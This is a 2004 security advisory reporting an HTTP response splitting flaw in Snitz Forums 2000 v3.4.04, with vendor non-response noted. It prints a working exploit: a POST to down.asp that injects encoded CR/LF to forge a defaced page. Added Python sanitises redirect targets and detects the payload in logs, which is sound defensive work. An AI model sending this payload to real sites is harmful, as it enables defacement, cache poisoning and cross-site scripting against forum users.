Snitz Forums 2000 v3.4.04 suffers from an HTTP response splitting vulnerability.
ADVISORY
Author: Maestro (me!)
Date: 16-SEP-04
Vendor: Snitz Communications (www.snitz.com)
Product: Snitz Forums 2000 v3.4.04
Product description: (from vendor website) "the leading ASP forum/bbs on the internet today"
Problem: HTTP response splitting (web cache poisoning, XSS, yadayadayada) - https://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf
Exploit:
POST /down.asp HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-length: 134
location=/foo?%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Length:%2014%0d%0aContent-Type:%20text/html%0d%0a%0d%0a{html}defaced{/html}
(replace the curly braces with less-than and greater-than signs)
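As an added illustration, not code from the advisory or from Snitz, the following Python shows the check a redirect handler such as down.asp should apply to the location field before writing it into a Location header, plus a log-side test for the encoded CR/LF that the request above relies on. The POST body is a constructed copy of the one above; DEFAULT_TARGET and the function names are assumptions.

```python
from urllib.parse import unquote_plus
import re

# Constructed copy of the advisory's POST body, used as test input.
ADVISORY_BODY = (
    "location=/foo?%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0a"
    "Content-Length:%2014%0d%0aContent-Type:%20text/html%0d%0a%0d%0a"
    "{html}defaced{/html}"
)

# Assumed fallback target; the advisory does not say where down.asp redirects by default.
DEFAULT_TARGET = "/default.asp"

# Matches an encoded or literal CR/LF in a raw (still URL-encoded) parameter value.
CRLF_PATTERN = re.compile(r"%0[dDaA]|[\r\n]")


def parse_form(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body the way the server would."""
    fields = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        fields[unquote_plus(key)] = unquote_plus(value)
    return fields


def safe_redirect_target(value: str, default: str = DEFAULT_TARGET) -> str:
    """Return a Location value that cannot split the response.

    `value` is the already-decoded form field (what Request.Form hands back).
    Anything containing a control character, or not a site-relative path, is
    replaced by the default, which closes the header injection and the open redirect.
    """
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in value):
        return default  # CR, LF, NUL etc. would terminate or forge headers
    if not value.startswith("/") or value[1:2] in ("/", "\\"):
        return default  # absolute URLs and protocol-relative "//host" are off-site
    return value


def looks_like_splitting(raw_body: str) -> bool:
    """Log-side check: flag a request body whose location field carries CR/LF."""
    for pair in raw_body.split("&"):
        key, _, raw_value = pair.partition("=")
        if key == "location" and CRLF_PATTERN.search(raw_value):
            return True
    return False
```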
Vendor status: vendor contacted several times (email to support@ and to the contact email in the code). No response from vendor.
--